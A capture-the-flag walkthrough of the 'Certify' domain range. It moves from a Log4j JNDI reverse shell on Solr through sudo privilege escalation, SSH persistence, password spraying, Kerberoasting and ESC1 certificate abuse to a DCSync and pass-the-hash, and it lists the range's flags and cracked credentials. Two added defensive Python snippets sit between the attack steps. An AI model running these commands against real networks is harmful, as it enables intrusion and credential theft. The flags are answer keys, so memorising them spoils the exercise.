Target introduction:
Certify is a medium-difficulty range environment. Completing it helps players understand agent forwarding, intranet scanning and information gathering in internal network penetration, as well as privilege escalation and lateral movement techniques; it strengthens the understanding of the core authentication mechanisms of a domain environment and covers some interesting technical points of domain penetration. There are 4 flags in the range, distributed across different target machines.
Starting the range gives an entry IP:
39.xx.xx.xxx
Scanning finds a Solr Admin panel:
icmp alive hosts len is: 1
39.xx.xx.xxx:22 open
39.xx.xx.xxx:8983 open
39.xx.xx.xxx:80 open
alive ports len is: 3
start vulscan
[*] WebTitle:http://39.xx.xx.xxx code:200 len:17 title:Welcome to nginx!
[*] WebTitle:http://39.xx.xx.xxx:8983 code:302 len:0 title:None
[*] WebTitle:http://39.xx.xx.xxx:8983/solr/ code:200 len:10 title:Solr Admin
Apache Solr <= 8.3.0 has an RCE vulnerability.
After trying it, I found that the target is not affected.
After some twists and turns, I found that Log4j could also be used.
JNDI injection is possible through the controllable Collections API parameter; the path is:
/solr/admin/collections?action=xxxxx
After testing with dnslog, the callback can be seen:
http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://dnslog.wnc78i.dnslog.cn}
So I started getting a reverse shell.
The original project is gone,
so I used a copy re-uploaded by other researchers:
https://github.com/black9/Log4shell_JNDIExploit.git
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 175.xx.xx.xx -p 8888
/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}
The listener also successfully received the reverse shell.
sudo -l shows that grc can be executed with NOPASSWD:
sudo grc --pty /bin/bash -i
This gives a root shell.
Flag01.txt can be read:
flag01: flag{366d6ba1-71fd-4b1a-94ad-5df60eb7433a}
netstat -ntpl shows that the target has ssh enabled,
so we can write a public key for remote ssh login without changing the ssh password.
Generate an RSA key:
ssh-keygen -t rsa
Then write the generated id_rsa.pub into the target's .ssh directory as authorized_keys:
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC09OeRl9NEQd/QfCp6aYdQN8wBXJxfZT93KHLaHkA5QghDSYnIzLtQROGZNmRaqyd3hasL0hIC9GKxsaC8JLo0ntUe7RQRyfDGnO00j6V7eqi7kzHgxg0Kjpuz5O0wtbmQz6Ibr7KquI0y/770OE1Ma68aTNXxhDY3/zoji5BnBSre+JvPrNiQlJW2fS6MjAz3xZ4T/cJ55LEIQHoJrsUx1xzu6dzlnYlWwPQsh9Ca59xzpecRagkVxCLX2q6fU6edh7M0sP11XT+lqPye0J/x7jN9ChY70BjZrAYsP2CmmU93yHWrV7sT2yBfpq5QPBTjyz/N+D7xLi8ZKEO4jzWS1E0ll0DOvwrKS11+g6Jfx3bPINOoteUcCM0wLl58drov91PIlRlPD5q1e/j5ngfKYZ4gUSzFgXxMQySa7D8zqX5w9OpxeYO2Og2uE6eYGE7Y7a9inaRvI2dfcPpa8YlMhz+wvJ5yKM9oewFCz9qaS6KWBVmdoxtCEFakbGRvT6c= ubuntu@VM-20-4-ubuntu' >>authorized_keys
Login succeeds.
There are many ways to upload the frp client and fscan; you can refer to other articles on my blog.
After the proxy is established, use Proxifier to connect.
The fscan results are as follows:
start infoscan
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.13 is alive
(icmp) Target 172.22.9.26 is alive
(icmp) Target 172.22.9.47 is alive
[*] Icmp alive hosts len is: 5
172.22.9.47:21 open
172.22.9.19:22 open
172.22.9.19:8983 open
172.22.9.26:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.7:88 open
172.22.9.13:445 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.13:139 open
172.22.9.7:139 open
172.22.9.26:135 open
172.22.9.13:135 open
172.22.9.7:135 open
172.22.9.47:139 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle:http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[+] NetInfo:
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[+] NetInfo:
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[+] NetInfo:
[*]172.22.9.13
[->]CA01
[->]172.22.9.13
[*] WebTitle:http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] 172.22.9.13 XIAORANG\CA01
[*] 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC
[*] 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO
[*] 172.22.9.47 WORKGROUP\FILESERVER Windows 6.1
[*] 172.22.9.47 (Windows 6.1)
[*] WebTitle:http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle:http://172.22.9.26 code:200 len:703 title:IIS Windows Server
[*] WebTitle:http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
At first glance there seems to be nothing to exploit. Viewing the web services through the proxy,
they are also just the default nginx and Apache pages.
Use smbclient to list the shares that can be accessed anonymously:
smbclient -L //172.22.9.47/
smbclient //172.22.9.47/fileserver
Download all the files inside.
This gives flag02:
________ _______ ________ _________ ___ ________ ___ ___
|\ ____\|\ ___ \ |\ __ \|\___ ___\\ \|\ _____\\ \ / /|
\ \ \___|\ \ __/|\ \ \|\ \|___ \ \_\ \ \ \ \__/\ \ \/ / /
\ \ \ \ \ \_|/_\ \ _ _\ \ \ \ \ \ \ \ __\\ \ / /
\ \ \____\ \ \_|\ \ \ \\ \| \ \ \ \ \ \ \ \_| \/ / /
\ \_______\ \_______\ \__\\ _\ \ \__\ \ \__\ \__\__/ / /
\|_______|\|_______|\|__|\|__| \|__| \|__|\|__|\___/ /
\|___|/
flag02: flag{efaa6dd8-3e17-4122-a768-2f077d34fb54}
Yes, you have enumerated SMB. But do you know what an SPN is?
There is also a SQLite database.
Opening it with Navicat reveals some names
and some passwords.
Combining the hints given above,
find a way to spray out a few valid users:
hydra -L user.txt -P pass 172.22.9.26 rdp
Got two:
login: zhangjian password: i9XDE02pLVf
login: liupeng password: fiAzGwEMgTY
Request service tickets for the users' SPNs (Kerberoast attack):
impacket-GetUserSPNs -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request
The default export format can be cracked with hashcat:
hashcat hashc.txt -m 13100 /usr/share/wordlist/rockyou.txt --show
Recovered passwords:
chenchen @Passw0rd@
zhangxia MyPass2@@6
Successfully logged in to 172.22.9.26 as user zhangxia.
The pdf from the anonymous SMB share mentioned this earlier:
Using Misconfigured Certificate Templates - ESC1 (certificate template misconfiguration) to escalate privileges within the domain.
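The hashcat mode used above (13100) cracks RC4-encrypted TGS-REP tickets, which is exactly what a domain controller logs as Event ID 4769 with TicketEncryptionType 0x17. As an added example (not from the original writeup), this groups constructed 4769 records by requester and flags anyone pulling RC4 tickets for several service accounts in a short time; the key=value layout and account names are constructed.

```python
from collections import defaultdict

# Constructed 4769 events flattened to key=value (not real telemetry). ServiceName
# is the account the SPN maps to; user accounts with SPNs are the roastable ones.
SAMPLE_4769 = """\
Time=2023-10-10T12:01:00 TargetUserName=zhangjian@XIAORANG.LAB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:172.22.9.26 Status=0x0
Time=2023-10-10T12:01:00 TargetUserName=zhangjian@XIAORANG.LAB ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=::ffff:172.22.9.26 Status=0x0
Time=2023-10-10T12:01:01 TargetUserName=zhangjian@XIAORANG.LAB ServiceName=svc_ftp TicketEncryptionType=0x17 IpAddress=::ffff:172.22.9.26 Status=0x0
Time=2023-10-10T12:05:00 TargetUserName=liupeng@XIAORANG.LAB ServiceName=DESKTOP-CBKTVMO$ TicketEncryptionType=0x12 IpAddress=::ffff:172.22.9.26 Status=0x0
Time=2023-10-10T12:06:00 TargetUserName=liupeng@XIAORANG.LAB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:172.22.9.7 Status=0x0
"""


def parse_events(text: str) -> list:
    """Turn each non-empty key=value line into a dict."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]


def is_roastable_request(ev: dict) -> bool:
    """A successful RC4 (etype 0x17) service ticket for a user-type service account."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == "0x17"  # RC4-HMAC: crackable offline
            and ev["Status"] == "0x0"
            and not svc.endswith("$")                    # machine accounts: random 120-char pw
            and svc.lower() != "krbtgt")                 # TGT requests, not service tickets


def kerberoast_alerts(text: str, threshold: int = 2) -> dict:
    """Map (requester, source IP) -> sorted service accounts when the count hits threshold.

    GetUserSPNs -request asks for every SPN at once, so the tell-tale sign is one
    principal collecting RC4 tickets for many unrelated services within seconds.
    """
    by_requester = defaultdict(set)
    for ev in parse_events(text):
        if is_roastable_request(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in by_requester.items() if len(v) >= threshold}


if __name__ == "__main__":
    for (user, ip), services in kerberoast_alerts(SAMPLE_4769).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

Moving service accounts to AES-only keys (or to gMSAs) removes the 0x17 tickets entirely, which turns the remaining RC4 requests into a high-confidence signal.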
Certify project: https://github.com/GhostPack/Certify
Find the vulnerable certificate template:
Certify.exe find /vulnerable
Run Certify to request a certificate, specifying /altname as the domain administrator:
Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:xiaorang\Administrator
Certificate requested
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Do not enter a password;
this generates the pfx certificate.
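What made the "XR Manager" request above succeed is a combination of template settings that `Certify.exe find /vulnerable` checks for. As an added example (not from the original writeup or the Certify project), this audits template attributes for the five ESC1 conditions; the flag bits and EKU OIDs are the documented values from the certificate-template schema, while the template dictionaries and the `enroll_sids` field are constructed.

```python
# Flag bits from the AD certificate-template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag (manager approval)

# EKUs that let the issued certificate log a user on (or that permit any use).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Well-known SIDs that mean "effectively everyone"; Domain Users is RID 513.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}

# Constructed templates (attribute names are real; values and enroll_sids are made up).
XR_MANAGER = {
    "name": "XR Manager",
    "msPKI-Certificate-Name-Flag": 0x1,           # enrollee supplies subject
    "msPKI-Enrollment-Flag": 0x0,                 # no manager approval
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll_sids": ["S-1-5-21-1-2-3-513"],        # Domain Users may enroll
}
XR_MANAGER_FIXED = dict(XR_MANAGER, **{
    "msPKI-Certificate-Name-Flag": 0x0,           # subject built from the requester's AD object
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
})


def esc1_findings(tpl: dict) -> list:
    """Return the ESC1 conditions this template meets; all five together are exploitable."""
    found = []
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.append("requester controls subject/SAN (ENROLLEE_SUPPLIES_SUBJECT)")
    if not tpl["pKIExtendedKeyUsage"] or set(tpl["pKIExtendedKeyUsage"]) & AUTH_EKUS:
        found.append("EKU allows client authentication")
    if not tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        found.append("no manager approval")
    if tpl["msPKI-RA-Signature"] == 0:
        found.append("no authorized signatures required")
    if any(s in LOW_PRIV_SIDS or s.endswith("-513") for s in tpl["enroll_sids"]):
        found.append("low-privileged principals may enroll")
    return found


def is_esc1(tpl: dict) -> bool:
    return len(esc1_findings(tpl)) == 5
```

Clearing the subject-supply flag or requiring manager approval breaks the chain; the audit shows which of the two the fixed template relies on.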
Use Rubeus to request a TGT with the certificate and pass the ticket (PTT).
Project address: Rubeus
The password can be empty:
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password: /ptt
Use mimikatz to perform DCSync and dump the domain controller's hashes:
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit
Then use wmiexec with the dumped hash to get the remaining two flags:
impacket-wmiexec XIAORANG.LAB/[email protected] -hashes :2f1b57eefb2d152196836b0516abea80
flag03: flag{990600da-05ce-40d8-b7b2-9230ab88bcd4}
impacket-wmiexec XIAORANG.LAB/[email protected] -hashes :2f1b57eefb2d152196836b0516abea80
flag04: flag{436cff95-95f9-408c-ad58-3be79709e2d4}